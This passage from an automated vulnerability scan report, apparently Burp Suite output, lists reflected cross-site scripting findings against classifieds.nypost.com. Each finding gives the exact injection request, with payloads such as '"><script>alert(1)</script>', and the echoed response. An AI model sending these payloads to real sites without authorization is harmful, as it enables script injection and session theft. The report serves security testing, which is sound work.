cmCreatePageviewTag("post ?f05d5"-alert(1)-"d62825c243a=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.141. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23656"><script>alert(1)</script>d50798e020e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?23656"><script>alert(1)</script>d50798e020e=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:32:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=4a9ad5ba08b2bce98db1714f0c97b1c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=023646d326636dbb53314fa5866e7dcf; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FODY1REQyNzRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post/?23656"><script>alert(1)</script>d50798e020e=1" />
...[SNIP]...

1.142. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98a3"-alert(1)-"0c04687f888 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salec98a3"-alert(1)-"0c04687f888/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3e2957e9e9845ca07eb98112f1e3830e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=3f7d92644e0d9effef47f2e0e487219b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMjk1ODBEMTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds salec98a3"-alert(1)-"0c04687f888/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.143. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d9c4"><script>alert(1)</script>e630142b13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale2d9c4"><script>alert(1)</script>e630142b13f/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=df974b08a505d83f66dd2cb252c59fac; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=031f7d9223c6547f69866b4905e1d99e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CQjBDM0JFNjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale2d9c4"><script>alert(1)</script>e630142b13f/" />
...[SNIP]...

1.144. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44400"><script>alert(1)</script>1c630243bd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale44400"><script>alert(1)</script>1c630243bd9/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=18f597758571f26182c84aac36fd15d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=6a72bb3687c8592cbdca977e15514344; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FQjQ4RTNGRTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale44400"><script>alert(1)</script>1c630243bd9/pet/" />
...[SNIP]...

1.145. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fcd"-alert(1)-"4468efc9463 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale91fcd"-alert(1)-"4468efc9463/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=38857c33b28574753cda78d14a8ace9b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5b560eb2679cecddb823a1e438f77f3b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DNDY1NTVEMjRENTBBQjM0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale91fcd"-alert(1)-"4468efc9463/pet/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.146. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1fb"-alert(1)-"e6aeb42b202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale5f1fb"-alert(1)-"e6aeb42b202/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=db3656c2d334c89d48a9aeee00a4eb5b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=89f560fafa0fe008c7944b926fd244f7; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CNjk0M0JBRTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale5f1fb"-alert(1)-"e6aeb42b202/pet/-/-/10036","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.147. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83116"><script>alert(1)</script>f555724feb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale83116"><script>alert(1)</script>f555724feb1/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=c3843b8b5645fcdd6180b66333ff6f5a; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=dfb363d6a7c622fa5c08d0a7920319b1; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FREVGRTIyQjRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale83116"><script>alert(1)</script>f555724feb1/pet/-/-/10036" />
...[SNIP]...

1.148. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5174a"><script>alert(1)</script>66e0d334f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale5174a"><script>alert(1)</script>66e0d334f09/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=8ca8783bcde0e3626257fd40f50ea31d; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=30a88cbede95e73839d97f2865251fc5; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNUI0RjY2QzRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale5174a"><script>alert(1)</script>66e0d334f09/tickets/" />
...[SNIP]...

1.149. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0b4"-alert(1)-"053f4fbbe15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale9d0b4"-alert(1)-"053f4fbbe15/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3b61d0721f4fb880e9a17c2f9aa52889; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=df011aa9b8df249936f6144bc05e0903; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNTEzRTk5NzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale9d0b4"-alert(1)-"053f4fbbe15/tickets/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.150. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21606"-alert(1)-"33cb9a6747e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service21606"-alert(1)-"33cb9a6747e/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=961aebc58092c07654941cb71392979f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5b9b87405ffdd0c0ff7ccaebb488832c; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1COUJBQTJGMzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds service21606"-alert(1)-"33cb9a6747e/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.151. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d866"><script>alert(1)</script>de5810db0a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service6d866"><script>alert(1)</script>de5810db0a0/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=eaaeaef750fa18669065f73738f27ea0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=196dd52b54953fa6764c5bbe3ca1ec50; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRkY5QTJEMjRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/service6d866"><script>alert(1)</script>de5810db0a0/" />
...[SNIP]...

1.152. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c63e6"-alert(1)-"5639a7966a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehiclec63e6"-alert(1)-"5639a7966a2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=fe0fad65bfacf582cd36a941dbe67490; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=80adaedeb7751b407e9ec87d32a8c8c0; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FMEJBMkQxOTRENTBBQjI0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehiclec63e6"-alert(1)-"5639a7966a2/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.153. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656a4"><script>alert(1)</script>f50e8208b9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle656a4"><script>alert(1)</script>f50e8208b9e/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b3b8561b90fc3f030b737c9ebd7877d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
